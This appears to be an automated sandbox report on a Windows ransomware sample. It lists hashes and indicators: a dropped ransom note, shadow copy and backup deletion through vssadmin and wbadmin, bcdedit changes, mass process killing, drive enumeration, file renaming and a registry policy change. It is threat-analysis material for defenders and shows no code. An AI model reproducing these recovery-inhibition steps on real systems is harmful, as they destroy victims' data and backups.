Analysis
-
max time kernel
153s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
27-02-2024 17:56
Behavioral task
behavioral1
Sample
c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe
Resource
win10v2004-20240226-en
General
-
Target
c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe
-
Size
332KB
-
MD5
0d5ccd706f75461b3fb9c56bc87b5c6f
-
SHA1
0c3755209682d5632a5fb20143ea7d93be5dc5e8
-
SHA256
c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1
-
SHA512
9288cdd355d9a6fab846fda6b46ea6c67ec706e089c02d9718661b754bb45be020e97bd48d7876d82a525dfaedc17f6c2303f03160932ea4d6e915f085714131
-
SSDEEP
6144:aY196WTQqBfFrQlVCuzw/322A1StYDBF+FTKtkV:R96eVFryVHzw/3XOfvtk
Malware Config
Extracted
C:\odt\How_to_back_files.html
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3376 created 3300 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 25 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1096 bcdedit.exe 2948 bcdedit.exe -
Renames multiple (343) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3532 wbadmin.exe -
pid Process 4396 wbadmin.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\L: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\Q: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\R: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\S: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\V: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\E: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\H: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\K: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\W: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\X: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\Z: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\G: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\N: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\T: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\O: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\U: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\B: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\J: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\M: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\Y: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\A: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\I: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened (read-only) \??\P: c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bn.pak c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\javafx\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_HK.properties c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Common Files\System\Ole DB\it-IT\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\icu.md c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-MX\tipresx.dll.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_jpn.xml c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\TabTip.exe.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Common Files\microsoft shared\ink\nl-NL\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\gu.pak c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterBold.ttf c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\colorimaging.md c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cldr.md c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.cpl c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Internet Explorer\en-US\ieinstal.exe.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\[email protected] c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Common Files\System\msadc\fr-FR\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\ImportStart.MTS c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Common Files\microsoft shared\ink\pt-BR\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\tr-TR\tipresx.dll.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsptg.xml c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Common Files\microsoft shared\ink\fr-CA\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-dayi.xml c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols.xml c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_100_percent.pak c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\directshow.md c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\mshwLatin.dll.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Internet Explorer\uk-UA\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\micaut.dll.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sr.pak c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RHeartbeatConfig.xml c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\ShapeCollector.exe.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bg.pak c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Common Files\microsoft shared\ink\bg-BG\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\System\ado\de-DE\msader15.dll.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\pt-BR.pak c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\icu_web.md c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\icudtl.dat c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\lv-LV\tipresx.dll.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Common Files\System\en-US\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Common Files\microsoft shared\ink\hu-HU\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sk.pak c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\webkit.md c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\Common Files\DESIGNER\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe File created C:\Program Files\dotnet\swidtag\How_to_back_files.html c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1468 vssadmin.exe -
Kills process with taskkill 14 IoCs
pid Process 4612 taskkill.exe 1316 taskkill.exe 3864 taskkill.exe 1036 taskkill.exe 3156 taskkill.exe 4404 taskkill.exe 1472 taskkill.exe 996 taskkill.exe 2816 taskkill.exe 880 taskkill.exe 1316 taskkill.exe 1004 taskkill.exe 4356 taskkill.exe 1684 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 32 IoCs
pid Process 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 3864 taskkill.exe Token: SeDebugPrivilege 1472 taskkill.exe Token: SeDebugPrivilege 1316 taskkill.exe Token: SeDebugPrivilege 996 taskkill.exe Token: SeDebugPrivilege 2816 taskkill.exe Token: SeDebugPrivilege 1004 taskkill.exe Token: SeDebugPrivilege 880 taskkill.exe Token: SeDebugPrivilege 1036 taskkill.exe Token: SeDebugPrivilege 3156 taskkill.exe Token: SeDebugPrivilege 4612 taskkill.exe Token: SeDebugPrivilege 4356 taskkill.exe Token: SeDebugPrivilege 1316 taskkill.exe Token: SeIncreaseQuotaPrivilege 3960 WMIC.exe Token: SeSecurityPrivilege 3960 WMIC.exe Token: SeTakeOwnershipPrivilege 3960 WMIC.exe Token: SeLoadDriverPrivilege 3960 WMIC.exe Token: SeSystemProfilePrivilege 3960 WMIC.exe Token: SeSystemtimePrivilege 3960 WMIC.exe Token: SeProfSingleProcessPrivilege 3960 WMIC.exe Token: SeIncBasePriorityPrivilege 3960 WMIC.exe Token: SeCreatePagefilePrivilege 3960 WMIC.exe Token: SeBackupPrivilege 3960 WMIC.exe Token: SeRestorePrivilege 3960 WMIC.exe Token: SeShutdownPrivilege 3960 WMIC.exe Token: SeDebugPrivilege 3960 WMIC.exe Token: SeSystemEnvironmentPrivilege 3960 WMIC.exe Token: SeRemoteShutdownPrivilege 3960 WMIC.exe Token: SeUndockPrivilege 3960 WMIC.exe Token: SeManageVolumePrivilege 3960 WMIC.exe Token: 33 3960 WMIC.exe Token: 34 3960 WMIC.exe Token: 35 3960 WMIC.exe Token: 36 3960 WMIC.exe Token: SeBackupPrivilege 2716 vssvc.exe Token: SeRestorePrivilege 2716 vssvc.exe Token: SeAuditPrivilege 2716 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3376 wrote to memory of 1096 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 96 PID 3376 wrote to memory of 1096 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 96 PID 3376 wrote to memory of 1096 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 96 PID 1096 wrote to memory of 4924 1096 cmd.exe 98 PID 1096 wrote to memory of 4924 1096 cmd.exe 98 PID 3376 wrote to memory of 1884 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 99 PID 3376 wrote to memory of 1884 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 99 PID 3376 wrote to memory of 1884 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 99 PID 1884 wrote to memory of 4796 1884 cmd.exe 101 PID 1884 wrote to memory of 4796 1884 cmd.exe 101 PID 4796 wrote to memory of 3864 4796 cmd.exe 102 PID 4796 wrote to memory of 3864 4796 cmd.exe 102 PID 3376 wrote to memory of 2688 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 104 PID 3376 wrote to memory of 2688 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 104 PID 3376 wrote to memory of 2688 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 104 PID 2688 wrote to memory of 3832 2688 cmd.exe 106 PID 2688 wrote to memory of 3832 2688 cmd.exe 106 PID 3832 wrote to memory of 4404 3832 cmd.exe 107 PID 3832 wrote to memory of 4404 3832 cmd.exe 107 PID 3376 wrote to memory of 3624 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 108 PID 3376 wrote to memory of 3624 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 108 PID 3376 wrote to memory of 3624 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 108 PID 3624 wrote to memory of 2356 3624 cmd.exe 110 PID 3624 wrote to memory of 2356 3624 cmd.exe 110 PID 2356 wrote to memory of 1472 2356 cmd.exe 111 PID 2356 wrote to memory of 1472 2356 cmd.exe 111 PID 3376 wrote to memory of 212 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 112 PID 3376 wrote to memory of 212 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 112 PID 3376 wrote to memory of 212 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 112 PID 212 wrote to memory of 3088 212 cmd.exe 114 PID 212 wrote to memory of 3088 212 cmd.exe 114 PID 3088 wrote to memory of 1316 3088 cmd.exe 115 PID 3088 wrote to memory of 1316 3088 cmd.exe 115 PID 3376 wrote to memory of 1684 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 116 PID 3376 wrote to memory of 1684 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 116 PID 3376 wrote to memory of 1684 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 116 PID 1684 wrote to memory of 3400 1684 cmd.exe 118 PID 1684 wrote to memory of 3400 1684 cmd.exe 118 PID 3400 wrote to memory of 996 3400 cmd.exe 119 PID 3400 wrote to memory of 996 3400 cmd.exe 119 PID 3376 wrote to memory of 3276 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 120 PID 3376 wrote to memory of 3276 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 120 PID 3376 wrote to memory of 3276 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 120 PID 3276 wrote to memory of 4292 3276 cmd.exe 122 PID 3276 wrote to memory of 4292 3276 cmd.exe 122 PID 4292 wrote to memory of 2816 4292 cmd.exe 123 PID 4292 wrote to memory of 2816 4292 cmd.exe 123 PID 3376 wrote to memory of 4524 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 124 PID 3376 wrote to memory of 4524 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 124 PID 3376 wrote to memory of 4524 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 124 PID 4524 wrote to memory of 3500 4524 cmd.exe 126 PID 4524 wrote to memory of 3500 4524 cmd.exe 126 PID 3500 wrote to memory of 1004 3500 cmd.exe 127 PID 3500 wrote to memory of 1004 3500 cmd.exe 127 PID 3376 wrote to memory of 2420 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 128 PID 3376 wrote to memory of 2420 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 128 PID 3376 wrote to memory of 2420 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 128 PID 2420 wrote to memory of 4488 2420 cmd.exe 130 PID 2420 wrote to memory of 4488 2420 cmd.exe 130 PID 4488 wrote to memory of 880 4488 cmd.exe 131 PID 4488 wrote to memory of 880 4488 cmd.exe 131 PID 3376 wrote to memory of 4348 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 132 PID 3376 wrote to memory of 4348 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 132 PID 3376 wrote to memory of 4348 3376 c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe 132 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe -
